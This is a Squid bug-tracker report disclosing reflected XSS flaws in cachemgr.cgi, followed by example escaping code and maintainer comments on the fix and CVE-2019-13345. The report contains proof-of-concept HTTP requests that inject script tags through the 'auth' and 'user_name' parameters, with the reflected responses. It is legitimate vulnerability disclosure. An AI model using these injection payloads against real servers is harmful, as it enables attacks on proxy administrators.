Bug 4957 - Multiple XSS issues in cachemgr.cgi
Summary: Multiple XSS issues in cachemgr.cgi
Status: RESOLVED FIXED
Alias: None
Product: Squid
Classification: Unclassified
Component: tools: cachemgr.cgi
Version: unspecified
Hardware: All All
Importance: P1 critical
Assignee: SQUID BUGS ALIAS
URL:
Depends on:
Blocks:
 
Reported: 2019-05-27 13:38 UTC by PAZ
Modified: 2024-02-15 08:34 UTC (History)

See Also:
Browser: ---
Fixed Versions: 4.8
Needs:


Attachments
Screenshots of the XSS issues (348.67 KB, application/zip)
2019-05-27 13:38 UTC, PAZ
Details

Description PAZ 2019-05-27 13:38:06 UTC
Created attachment 3715 [details]
Screenshots of the XSS issues

The "cachemgr.cgi" web module of the squid proxy is vulnerable to XSS issues. The vulnerable parameters "user_name" and "auth" have insufficient sanitization in place.

The method (rfc_1738_unescape()) defined in the source file /lib/rfc1738.c was not enforced for all HTTP response params per request type defined in the cachemgr.cc source code.

For instance, on line 1092 of the source file /squid/tools/cachemgr.cc, the decode_pub_auth() method does not enforce any sanitization for the parameters parsed by strtok(), which causes the first XSS vulnerability.

The first XSS vulnerability found on the "auth" parameter can be triggered by submitting the following GET request:

HTTP Request:

GET /cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=admin&operation=authenticate&auth=bG9jYWxob3N0fDE1NTg5NTYzNzJ8YWRtIj48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0PmlufGRzZGFkYWE= HTTP/1.1
Host: 10.211.55.3
[SNIPPED]

HTTP Response:

HTTP/1.1 200 OK
Date: Mon, 27 May 2019 12:18:58 GMT
Server: Apache/2.4.25 (Debian)
[SNIPPED]

<TR><TH ALIGN="left">Cache Host:</TH><TD><INPUT NAME="host" size="30" VALUE="localhost"></TD></TR>
<TR><TH ALIGN="left">Cache Port:</TH><TD><INPUT NAME="port" size="30" VALUE="3128"></TD></TR>
<TR><TH ALIGN="left">Manager name:</TH><TD><INPUT NAME="user_name" size="30" VALUE="adm"><script>alert('XSS')</script>in"></TD></TR>
[SNIPPED]

The payload within the base64-encoded auth value (bG9jYWxob3N0fDE1NTg5NTYzNzJ8YWRtIj48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0PmlufGRzZGFkYWE=) is:
localhost|1558956372|adm"><script>alert('XSS')</script>in|dsdadaa

The second vulnerable parameter, "user_name", can be exploited by submitting the following HTTP GET request:

HTTP Request:
GET /cgi-bin/cachemgr.cgi?server=&host=localhost&port=3128&user_name=ad"><script>alert('XSS')</script>min&passwd= HTTP/1.1
Host: 10.211.55.3
[SNIPPED]

HTTP Response:
HTTP/1.1 200 200 OK
[SNIPPED]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><TITLE>CacheMgr@localhost: menu</TITLE>
<STYLE type="text/css"><!--BODY{background-color:#ffffff;font-family:verdana,sans-serif}TABLE{background-color:#333333;border:0pt;padding:0pt}TH,TD{background-color:#ffffff;white-space:nowrap}--></STYLE>
</HEAD><BODY>
<H2><a href="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=authenticate&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager</a> menu for localhost:</H2><UL>
<UL>
<LI type="disk"><A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=index&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager Interface</A>
<LI type="disk"><A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=menu&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager Menu</A>
<LI type="circle">Toggle offline_mode setting (hidden)<A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=offline_toggle&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">.</A>
<LI type="circle">Shut Down the Squid Process (hidden)<A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=shutdown&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">.</A>
[SNIPPED]
Please check the screenshots for the proofs.
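As an added illustration of the output escaping the report calls for (example code, not Squid's own and not part of the report): a helper that HTML-escapes user_name before it is written into the form's VALUE attribute, applied to the decoded auth token from the first request. The names htmlEscape, splitAuthFields and renderUserNameInput are hypothetical; the base64 layer is assumed to have been removed already.

```cpp
#include <string>
#include <vector>
#include <iostream>

// Escape a string for insertion into HTML text or a quoted attribute value.
// Each HTML-significant character becomes a character reference, so a value
// such as adm"><script>... can no longer close the VALUE="..." attribute.
std::string htmlEscape(const std::string &in) {
    std::string out;
    out.reserve(in.size());
    for (unsigned char c : in) {
        switch (c) {
        case '&':  out += "&amp;";  break;
        case '<':  out += "&lt;";   break;
        case '>':  out += "&gt;";   break;
        case '"':  out += "&quot;"; break;
        case '\'': out += "&#39;";  break;
        default:   out += static_cast<char>(c);
        }
    }
    return out;
}

// Split the decoded auth token (host|time|user|passwd) on '|'.
// The fields remain attacker-controlled and must be escaped before rendering.
std::vector<std::string> splitAuthFields(const std::string &decoded) {
    std::vector<std::string> fields;
    std::string cur;
    for (char c : decoded) {
        if (c == '|') { fields.push_back(cur); cur.clear(); }
        else cur += c;
    }
    fields.push_back(cur);
    return fields;
}

// Render the "Manager name" input as shown in the report, with the value escaped.
std::string renderUserNameInput(const std::string &userName) {
    return "<INPUT NAME=\"user_name\" size=\"30\" VALUE=\"" + htmlEscape(userName) + "\">";
}

int main() {
    // Constructed sample: the decoded auth token from the report's first request.
    std::string decoded = "localhost|1558956372|adm\"><script>alert('XSS')</script>in|dsdadaa";
    std::vector<std::string> f = splitAuthFields(decoded);
    std::cout << renderUserNameInput(f[2]) << "\n";  // script tags arrive as inert text
    return 0;
}
```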
Comment 1 Amos Jeffries 2019-07-05 03:28:17 UTC
https://github.com/squid-cache/squid/pull/429 has been opened to resolve the issue of insufficient normalization and escaping of the HTML outputs.
Comment 2 Amos Jeffries 2019-07-07 10:26:31 UTC
PR has been applied to Squid-5.

It also appears CVE-2019-13345 has been assigned for this issue.
Comment 3 Amos Jeffries 2019-07-11 13:41:24 UTC
Applied to squid-3.5 as well